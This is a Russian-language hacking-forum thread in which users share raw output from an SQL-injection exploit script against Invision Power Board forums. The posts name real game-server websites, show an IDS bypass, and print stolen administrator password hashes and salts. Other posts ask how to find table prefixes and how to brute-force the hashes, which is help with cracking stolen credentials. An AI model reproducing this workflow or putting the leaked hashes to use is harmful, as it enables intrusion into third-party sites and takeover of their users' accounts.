Re: Рабочая уязвимость на сайте сервера из топ15 l2top
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!
как определить sql prefix?
либо префикс правильный, но стоит защита?
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Практикуйтесь на здоровье...
Код:
+ http://l2storm.com/
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
+ pass_hash=abb647bada07836fc473eda72ef54884
+ Ok, using hash abb647bada07836fc473eda72ef54884
/ Trying to get the password salt
+ pass_salt=X&X^M
+ Ok, using salt X&X^M
+ Enjoy!
+ http://newlands-servers.com/forum/
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 3
/ Trying to get the password hash
+ pass_hash=5e635b8524bb078033c520594e1d1e16
+ Ok, using hash 5e635b8524bb078033c520594e1d1e16
/ Trying to get the password salt
+ pass_salt=v,6#{
+ Ok, using salt v,6#{
+ Enjoy!
+ http://thevoshod.ru/forum/
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 2
/ Trying to get the password hash
+ pass_hash=3b08fdb1aa90e8f4dac074dfeb62a5ad
+ Ok, using hash 3b08fdb1aa90e8f4dac074dfeb62a5ad
/ Trying to get the password salt
+ pass_salt=*El?}
+ Ok, using salt *El?}
+ Enjoy!
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
пол инета перерыл в поисках ответа
Sql prefix, как я понял, можно менять, при этом знать его будет только адм. следовательно сплойтом уже не побалуешься?)
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Цитата:
Сообщение от BuT9H(забыл пасс)
Скачал видео включил музыка идет но картинки нету,что делать?
кодеки обнови.
+ [21.03.2010 22:44:30]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
объясните пожалуйста, почему пишет вот такую фигню:
Attack(s):
+ [21.03.2010 23:34:58]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
+ Forum vulnerable!
/ Using default table prefix: ibf_<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
- Prefix ibf_ is incorrect!<!--error-->
Deprecated: Function ereg() is deprecated in Z:\usr\local\php5\2.3.5-ipb-multi.p
hp on line 1964
<script language=JavaScript src='/denwer/errors/phperror_js.php'></script>
- Mysql version 4
- Get prefix impossible!
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Ну вот, я ввёл в [Ссылки могут видеть только зарегистрированные пользователи. ]
Хеш, салт, получил MD5, пошол в passpro, ввёл туда этот MD5, нажал брут форс, он у мя дет минут 10 пароли перебирал и ничего не нашол!
что я не так делаю? Oo
________________
We are Ducks. We are birds. We like bread. We cryack. Cryack.